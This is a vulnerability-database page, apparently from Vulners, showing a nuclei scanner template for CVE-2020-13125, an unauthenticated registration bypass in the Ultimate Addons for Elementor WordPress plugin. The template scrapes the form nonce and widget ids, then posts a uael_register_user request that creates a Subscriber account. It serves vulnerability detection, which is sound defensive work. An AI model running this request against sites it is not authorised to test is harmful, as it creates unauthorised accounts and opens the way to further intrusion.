Lucene search
K

Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Unauthenticated users can create Subscriber accounts in Ultimate Addons for Elementor before 1.24.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-13125
27 Dec 202517:51
circl
Circl
CVE-2020-13126
19 Jun 202612:53
circl
CNVD
WordPress Unauthorized Operation Vulnerability (CNVD-2020-29838)
18 May 202000:00
cnvd
CNVD
WordPress Elementor Pro Code Issue Vulnerability
18 May 202000:00
cnvd
CVE
CVE-2020-13125
17 May 202000:39
cve
CVE
CVE-2020-13126
17 May 202000:38
cve
Cvelist
CVE-2020-13125
17 May 202000:39
cvelist
Cvelist
CVE-2020-13126
17 May 202000:38
cvelist
EUVD
EUVD-2020-5401
7 Oct 202500:30
euvd
EUVD
EUVD-2020-5402
7 Oct 202500:30
euvd
Rows per page
id: CVE-2020-13125

info:
  name: Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass
  author: daffainfo
  severity: high
  description: |
    An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
  impact: |
    Unauthenticated attackers can create user accounts with Subscriber role, potentially leading to further malicious activities or privilege escalation
  remediation: |
    Update to version 1.24.2 or later.
  reference:
    - https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13125
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2020-13125
    epss-score: 0.02307
    epss-percentile: 0.81281
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: brainstormforce
    product: ultimate_addons_for_elementor
    framework: wordpress
  tags: cve2020,cve,wp,wordpress,wp-plugin,brainstormforce,ultimate-addons-for-elementor,vkev

flow: |
  http(1)
  for (let widget_id of iterate(template.widgets_id)) {
    set("widget_id", widget_id)
    http(2)
  }

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "uaelRegistration", "form_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_nonce
        part: body
        group: 1
        regex:
          - ',"form_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: post_id
        part: body
        group: 1
        regex:
          - '"post":{"id":([0-9]+),'
        internal: true

      - type: regex
        name: widgets_id
        part: body
        group: 1
        regex:
          - 'elementor-widget-uael-registration-form" data-id="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uael_register_user&nonce={{form_nonce}}&data[page_id]={{post_id}}&data[widget_id]={{widget_id}}&data[user_name]={{username}}&data[email]={{email}}&data[password]={{password}}&data[first_name]={{firstname}}&data[last_name]={{lastname}}&data[send_email]={{randstr}}&data[auto_login]=yes

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'successfully registered'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009667ab993bcd1dde4f963aae3179a2daceab278ca8ec21163e645c9bf4bcf413022100f6730f68ea55213b65e49c27c754a2790dd066fc7298c9c138a194485a1b8d6d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 26.5
CVSS 3.19.9
CVSS 39.9
EPSS0.08565
24